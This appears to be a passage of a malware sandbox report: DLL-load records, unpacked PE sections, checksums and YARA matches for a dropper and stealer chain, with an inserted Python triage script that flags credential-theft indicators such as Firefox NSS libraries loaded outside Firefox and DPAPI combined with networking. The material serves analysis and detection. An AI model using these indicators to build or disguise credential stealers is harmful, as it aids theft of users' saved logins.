Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: netutils.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: apphelp.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: winmm.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: uxtheme.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: windows.storage.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: wldp.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: propsys.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: profapi.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: edputil.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: urlmon.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: iertutil.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: srvcli.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: netutils.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: sspicli.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: wintypes.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: appresolver.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: slc.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: userenv.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: sppc.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: pcacli.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: mpr.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: netutils.dll
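The module-load records above are the same telemetry an image-load sensor (for example Sysmon event 7) produces on a real host, and the combination they show for file.exe is characteristic of a stealer: an executable running from a user-writable path that loads the Mozilla NSS libraries (mozglue.dll; the nss3/softokn3/freebl3 PDB strings appear further down) used to decrypt Firefox credential stores, together with dpapi.dll and WinINet/WinHTTP for exfiltration. The following is an added triage script, not part of the sandbox report or of any of the detected families' code, that parses lines in the report's own "Source: ... Section loaded: ..." format, groups modules per process and applies those three heuristics. The sample lines are a constructed subset copied from this section; the Firefox install-path check and the flag names are this example's own assumptions.

```python
import re
from collections import defaultdict

# Matches the report's "Source: <image> Section loaded: <dll>" lines. Any
# trailing "Jump to behavior" link text is simply ignored.
LINE_RE = re.compile(r"^Source:\s+(?P<image>.+?)\s+Section loaded:\s+(?P<dll>\S+)")

# Mozilla NSS/NSPR libraries: expected inside a Mozilla product, but loaded by
# stealers to decrypt Firefox logins.json. The path test used below
# ("\Mozilla Firefox\") is a simplifying assumption for this example.
NSS_LIBS = {"mozglue.dll", "nss3.dll", "softokn3.dll", "freebl3.dll"}
NETWORK_LIBS = {"wininet.dll", "winhttp.dll", "wsock32.dll", "ws2_32.dll"}
DPAPI_LIBS = {"dpapi.dll"}


def modules_by_process(lines):
    """Group lower-cased module names per image path."""
    loaded = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            loaded[m.group("image")].add(m.group("dll").lower())
    return loaded


def triage(lines):
    """Return {image: sorted flag list} for processes whose module set looks
    like an information stealer; processes with no flags are omitted."""
    results = {}
    for image, mods in modules_by_process(lines).items():
        low = image.lower()
        flags = []
        # NSS loaded by something that is not installed as Firefox.
        if mods & NSS_LIBS and "\\mozilla firefox\\" not in low:
            flags.append("nss-outside-firefox")
        # DPAPI (Chromium Login Data / cookie key unwrapping) plus a network stack.
        if mods & DPAPI_LIBS and mods & NETWORK_LIBS:
            flags.append("dpapi-plus-network")
        # Image running from a user-writable location rather than Program Files.
        if "\\users\\" in low and "\\program files" not in low:
            flags.append("user-writable-image")
        if flags:
            results[image] = sorted(flags)
    return results


# Constructed sample: a subset of the records printed in this section.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll",
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll",
    r"Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Section loaded: wininet.dll",
]

if __name__ == "__main__":
    for image, flags in triage(SAMPLE_LINES).items():
        print(image, "->", ", ".join(flags))
```

On the sample, file.exe trips all three heuristics, axplong.exe (the Amadey loader copy, which loads only the network libraries) trips just the path check, and msedge.exe is not reported at all; the value of the NSS rule in particular is that Firefox's own DLLs are almost never loaded by anything but Firefox.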
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Docs.lnk.27.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Google Drive.lnk.27.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.27.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.27.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.27.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.27.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2467980836.000000006C5FD000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2467980836.000000006C5FD000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xipewav:R;.gata:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Unpacked PE file: 5.2.RoamingCBFCFBFBFB.exe.750000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Unpacked PE file: 8.2.RoamingIJDGCAEBFI.exe.e70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 9.2.axplong.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 10.2.axplong.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 14.2.explorti.exe.660000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 15.2.explorti.exe.660000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 19.2.explorti.exe.660000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 20.2.axplong.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Unpacked PE file: 21.2.48f0ec6733.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xipewav:R;.gata:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Unpacked PE file: 44.2.48f0ec6733.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xipewav:R;.gata:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Unpacked PE file: 21.2.48f0ec6733.exe.400000.0.unpack
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Unpacked PE file: 24.2.ee7a49fbf0.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Unpacked PE file: 44.2.48f0ec6733.exe.400000.0.unpack
Source: Yara match File source: 24.0.ee7a49fbf0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.ee7a49fbf0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\1000003002\ee7a49fbf0.exe, type: DROPPED
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: ee7a49fbf0.exe.19.dr Static PE information: real checksum: 0x0 should be: 0x1c0e1
Source: explorti.exe.8.dr Static PE information: real checksum: 0x1d3ae7 should be: 0x1d959a
Source: axplong.exe.5.dr Static PE information: real checksum: 0x1da2f0 should be: 0x1d017e
Source: random[1].exe0.19.dr Static PE information: real checksum: 0x0 should be: 0x1c0e1
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: real checksum: 0x1d3ae7 should be: 0x1d959a
Source: random[1].exe.0.dr Static PE information: real checksum: 0x1da2f0 should be: 0x1d017e
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: real checksum: 0x1da2f0 should be: 0x1d017e
Source: enter[1].exe.0.dr Static PE information: real checksum: 0x1d3ae7 should be: 0x1d959a
Source: file.exe Static PE information: section name: .xipewav
Source: file.exe Static PE information: section name: .gata
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: qzeqbxes
Source: random[1].exe.0.dr Static PE information: section name: qgghuozc
Source: random[1].exe.0.dr Static PE information: section name: .taggant
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name:
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name: .idata
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name:
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name: qzeqbxes
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name: qgghuozc
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name: .taggant
Source: enter[1].exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name: .idata
Source: enter[1].exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name: usoriijt
Source: enter[1].exe.0.dr Static PE information: section name: ymfuwjgb
Source: enter[1].exe.0.dr Static PE information: section name: .taggant
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name:
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name: .idata
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name:
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name: usoriijt
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name: ymfuwjgb
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name: .taggant
Source: axplong.exe.5.dr Static PE information: section name:
Source: axplong.exe.5.dr Static PE information: section name: .idata
Source: axplong.exe.5.dr Static PE information: section name:
Source: axplong.exe.5.dr Static PE information: section name: qzeqbxes
Source: axplong.exe.5.dr Static PE information: section name: qgghuozc
Source: axplong.exe.5.dr Static PE information: section name: .taggant
Source: explorti.exe.8.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name: .idata
Source: explorti.exe.8.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name: usoriijt
Source: explorti.exe.8.dr Static PE information: section name: ymfuwjgb
Source: explorti.exe.8.dr Static PE information: section name: .taggant
Source: random[1].exe.19.dr Static PE information: section name: .xipewav
Source: random[1].exe.19.dr Static PE information: section name: .gata
Source: 48f0ec6733.exe.19.dr Static PE information: section name: .xipewav
Source: 48f0ec6733.exe.19.dr Static PE information: section name: .gata
Source: random[1].exe0.19.dr Static PE information: section name: .code
Source: ee7a49fbf0.exe.19.dr Static PE information: section name: .code
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A9F5 push ecx; ret 0_2_0041AA08
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BB536 push ecx; ret 0_2_6C5BB549
Source: file.exe Static PE information: section name: .text entropy: 7.816119789832956
Source: random[1].exe.0.dr Static PE information: section name: entropy: 7.978158442993088
